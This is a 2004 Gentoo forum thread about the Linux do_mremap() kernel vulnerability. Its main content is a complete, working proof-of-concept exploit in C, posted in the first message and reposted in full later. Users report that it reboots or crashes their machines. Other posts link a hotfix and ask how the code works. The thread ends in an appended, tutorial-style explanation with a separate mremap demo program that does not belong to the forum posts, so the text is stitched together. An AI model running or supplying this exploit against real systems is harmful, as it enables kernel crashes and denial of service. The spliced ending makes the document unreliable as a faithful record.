Gentoo Forums
mremap test util :-))) or kill you Penguin
Gentoo Forums Forum Index :: Networking & Security
Bash[DevNull]
Guru
Joined: 10 Oct 2003
Posts: 333

PostPosted: Tue Jan 06, 2004 9:36 am    Post subject: mremap test util :-))) or kill you Penguin Reply with quote

/*
 * Proof-of-concept exploit code for do_mremap()
 *
 * Copyright (C) 2004 Christophe Devine and Julien Tinnes
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED   2

/* Bind real_mremap() directly to the mremap system call number, so the
 * _syscall5 stub below issues the raw syscall and all five arguments
 * reach the kernel without passing through the libc wrapper. */
#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    /* An ordinary two-page anonymous mapping to hand to mremap(). */
    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    /* Zero-sized move to a fixed address: the request the vulnerable
     * do_mremap() mishandles. */
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}
_________________
Biomechanical Artificial Sabotage Humanoid
Bash[DevNull]
Guru
Joined: 10 Oct 2003
Posts: 333

PostPosted: Tue Jan 06, 2004 9:42 am    Post subject: Reply with quote

Heh, on the stable (x86) 2.4.22-gentoo-r2 kernel with the GRSECURITY patch it doesn't work.

I have no time to rewrite and test the util, but I think it can be...
It's all in this small piece of code...

#ifdef CONFIG_GRKERNSEC_PAX_SEGMEXEC
    if ((current->flags & PF_PAX_SEGMEXEC) &&
        (new_len > SEGMEXEC_TASK_SIZE || new_addr > SEGMEXEC_TASK_SIZE-new_len))
        goto out;
#endif
_________________
Biomechanical Artificial Sabotage Humanoid
drspewfy
Tux's lil' helper
Joined: 13 Dec 2003
Posts: 125
Location: Mexico

PostPosted: Tue Jan 06, 2004 11:14 am    Post subject: i cant install lsof and login Reply with quote

I compiled the exploit..
and.. when I run it..
./mremap
my system got rebooted, my system rebooted suddenly in 2 seconds..
why??
Doesn't it give root??

My kernel is
2.4.20-gentoo-r5
and I tried with another kernel on another system and I got the same,,
the system rebooted
with the r9.

Well, see ya
=)))
I hope you can give me some help..
or how to fix the vulnerability
Bash[DevNull]
Guru
Joined: 10 Oct 2003
Posts: 333

PostPosted: Tue Jan 06, 2004 11:59 am    Post subject: Reply with quote

It is not an exploit that gives you root privileges. It is a proof-of-concept exploit; that means it only shows that your system has this bug.

The hot-fix can be found here: https://forums.gentoo.org/viewtopic.php?t=121529
_________________
Biomechanical Artificial Sabotage Humanoid
drspewfy
Tux's lil' helper
Joined: 13 Dec 2003
Posts: 125
Location: Mexico

PostPosted: Tue Jan 06, 2004 12:22 pm    Post subject: Reply with quote

YES, but when I try the exploit
my system gets rebooted
....
:S
weird
fleed
l33t
Joined: 28 Aug 2002
Posts: 756
Location: London

PostPosted: Tue Jan 06, 2004 12:30 pm    Post subject: Reply with quote

Do you mean that the hotfix that Bash pointed to is worthless?
Simba
n00b
Joined: 08 Nov 2002
Posts: 60

PostPosted: Tue Jan 06, 2004 8:43 pm    Post subject: Reply with quote

It doesn't work with my kernel, although my kernel is an old 2.4.20-xfs-r3
kernel. ./mremap just quits with a Segmentation fault, that's all.
RAPUL
l33t
Joined: 29 Dec 2002
Posts: 664
Location: Valencia (SPAIN)

PostPosted: Thu Jan 08, 2004 4:38 pm    Post subject: It doesn't work... Reply with quote

It does nothing for me.

I am still using an old gentoo-sources-2.4.20-r7 which has been running for 80 days without a reboot...
_________________
Entropy rulz world.
Redundancy sux.
World is full of redundancy.
World sux.
donwimani
n00b
Joined: 05 Mar 2004
Posts: 19

PostPosted: Fri May 28, 2004 7:48 pm    Post subject: understanding the code Reply with quote

Hi,

I was trying to understand how exactly the code makes the kernel crash.

sys_real_mremap() is declared by the code:
Code:

static inline _syscall5(
      void *, real_mremap,
      void *, old_address,
      size_t, old_size,
      size_t, new_size,
      unsigned long, flags,
      void *, new_address );

and by defining __NR_real_mremap as __NR_mremap
Code:

#define __NR_real_mremap __NR_mremap

a call to real_mremap() will result in a call to ENTRY(sys_call_table).__NR_mremap,
which is the sys_mremap system call,
but this call only takes 4 arguments, so when using
Code:

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 );

this would actually be the same as
Code:

mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED );

so I thought...
My assumptions don't seem to be correct.

Can anyone help me understand the code?

regards

I'll put the full code here for reference
Code:

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED   2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}
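The kernel's mremap entry point takes five arguments (old_address, old_size, new_size, flags, new_address), and a _syscall5 stub hands all five to the kernel in registers; the fifth one is the destination the kernel uses when MREMAP_FIXED is set. The program below is an added example, not code from this thread or from the proof-of-concept's authors: it moves an ordinary anonymous mapping to a caller-chosen address with the raw syscall(SYS_mremap, ...) and checks that the mapping really landed at new_address with its contents intact. REGION_SIZE and demo_mremap_fixed() are names chosen for the example.

```c
#define _GNU_SOURCE            /* MREMAP_FIXED / MREMAP_MAYMOVE in <sys/mman.h> */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#define REGION_SIZE 8192       /* two 4 KiB pages, like the thread's mmap() call */

/* Move an anonymous mapping to a chosen address with the five-argument raw
 * mremap syscall and verify each step.  Returns 0 on success or a negative
 * step number on the first failure (errno is left set by the failing call). */
int demo_mremap_fixed(void)
{
    /* Source region, filled with a recognisable pattern. */
    char *src = mmap(NULL, REGION_SIZE, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (src == MAP_FAILED)
        return -1;
    memset(src, 'A', REGION_SIZE);

    /* Reserve a free range so we know a sane address to ask for.  MREMAP_FIXED
     * replaces whatever is mapped at new_address, so this placeholder mapping
     * is only a way of picking the target; it is overwritten by the move. */
    char *target = mmap(NULL, REGION_SIZE, PROT_NONE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (target == MAP_FAILED)
        return -2;

    /* Raw syscall: old_address, old_size, new_size, flags, new_address. */
    long ret = syscall(SYS_mremap, src, (size_t)REGION_SIZE, (size_t)REGION_SIZE,
                       MREMAP_MAYMOVE | MREMAP_FIXED, target);
    if (ret == -1)
        return -3;                        /* kernel rejected the request */
    if ((char *)ret != target)
        return -4;                        /* fifth argument was not honoured */

    /* The pages moved with the mapping, so the pattern must be visible at
     * the new address; src must no longer be touched. */
    if (target[0] != 'A' || target[REGION_SIZE - 1] != 'A')
        return -5;

    munmap(target, REGION_SIZE);
    return 0;
}

int main(void)
{
    int rc = demo_mremap_fixed();
    if (rc != 0)
        fprintf(stderr, "step %d failed: %s\n", -rc, strerror(errno));
    else
        puts("mapping moved to the requested address; all five arguments were used");
    return rc != 0;
}
```

The glibc mremap() wrapper is declared variadic for the same reason: when MREMAP_FIXED is in flags it reads new_address as its fifth argument and forwards it, so the wrapper and the raw syscall behave alike here. Checking the return value against the requested target, rather than assuming success, is the habit that matters when exercising memory-management syscalls.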